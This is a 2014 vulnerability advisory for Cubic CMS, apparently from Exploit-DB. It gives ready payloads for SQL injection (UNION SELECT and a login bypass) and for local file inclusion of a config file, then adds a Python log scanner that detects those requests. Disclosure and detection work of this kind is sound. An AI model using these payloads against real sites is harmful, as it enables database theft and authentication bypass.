Cubic CMS – Multiple Vulnerabilities

  • Author: Eugenio Delfa
    Date: 2014-01-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/30790/

    I. BACKGROUND
    -------------------------
    "CUBIC CMS" is a non-free content management system for websites and 
    portals of any size. It is powerful, adaptable to any graphic design, 
    and lets users administer the website in a way that is 100% 
    professional yet simple.
    
    II. VULNERABILITIES
    -------------------------
    
    II.i FULL PATH DISCLOSURE
    -------------------------
    CUBIC CMS discloses the full path in its 'Controller Not Found' 
    exception handling, due to incorrect 'Software Exception' management.
    
    Syntax: 
    http://www.example.com/id/-22
    http://www.example.com/foo.bar
    
    II.ii SQL Injection
    -------------------------
    CUBIC CMS is vulnerable to SQL injection through the 'resource_id' and 
    'version_id' parameters of its '/recursos/agent.php' (Resources Management 
    Module) script via the HTTP GET method, due to insufficient sanitization 
    of user-supplied data.
    
    Syntax:
    http://www.example.com/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- -
    http://www.example.com/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- -
    
    II.iii SQL Injection
    -------------------------
    CUBIC CMS is vulnerable to SQL injection through the 'login' and 'pass' 
    parameters of its '/login.usuario' (Users Management Module) script via the 
    HTTP POST method, due to insufficient sanitization of user-supplied data.
    
    Syntax:
    login=Administrator&pass=foobar') or ('1'='1
    
    II.iv Local File Inclusion
    -------------------------
    CUBIC CMS is vulnerable to local file inclusion through the 'path' parameter 
    of its '/recursos/agent.php' (Resources Management Module) script via the 
    HTTP GET method, due to insufficient sanitization of user-supplied data.
    
    Syntax:
    http://www.example.com/recursos/agent.php?path=/../../application/config/project.ini
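
    For reviewing web server logs for the request patterns in II.ii and II.iv,
    the following is an added example (not part of the original advisory or of
    CUBIC CMS) that flags non-numeric ids and parent-directory segments sent to
    '/recursos/agent.php'. Assumptions: combined-format access logs, legitimate
    ids are non-negative integers, and the log lines are constructed samples;
    the POST body of II.iii does not appear in access logs and is not covered.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
AGENT_PATH = "/recursos/agent.php"         # script named in II.ii and II.iv
ID_PARAMS = ("resource_id", "version_id")  # parameters named in II.ii

# Constructed sample entries (documentation addresses, made-up sizes).
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Jan/2014:10:00:01 +0000] '
    '"GET /recursos/agent.php?resource_id=42 HTTP/1.1" 200 512',
    '198.51.100.9 - - [07/Jan/2014:10:00:05 +0000] '
    '"GET /recursos/agent.php?version_id=-22%20OR%20%27%27%20UNION%20SELECT%20@@version--%20- HTTP/1.1" 200 530',
    '198.51.100.9 - - [07/Jan/2014:10:00:09 +0000] '
    '"GET /recursos/agent.php?path=/../../application/config/project.ini HTTP/1.1" 200 904',
]


def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if url.path != AGENT_PATH:
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for name in ID_PARAMS:
        for value in params.get(name, []):
            # Assumption: a legitimate id is a plain non-negative integer.
            if not re.fullmatch(r"[0-9]+", value):
                findings.append(f"{name}: non-numeric value {value!r}")
    for value in params.get("path", []):
        # parse_qs decoded once; decode again to catch double encoding.
        segments = unquote(value).replace("\\", "/").split("/")
        if ".." in segments:
            findings.append(f"path: parent-directory segment in {value!r}")
    return findings


def scan(lines):
    """Map line index -> findings for every line that raised at least one."""
    return {i: f for i, line in enumerate(lines) if (f := classify(line))}


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG).items():
        print(index, findings)
```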
    
    IV. REFERENCES
    -------------------------
    http://www.proyectosbds.com
    
    V. DISCLOSURE TIMELINE
    -------------------------
    - March 28, 2012: First Vendor Contact.
    - Dec 30, 2013: Second Vendor Contact (Still waiting for responses).
    
    VI. CREDITS
    -------------------------
    This vulnerability has been discovered by Eugenio Delfa <ed (at) isbox (dot) org>.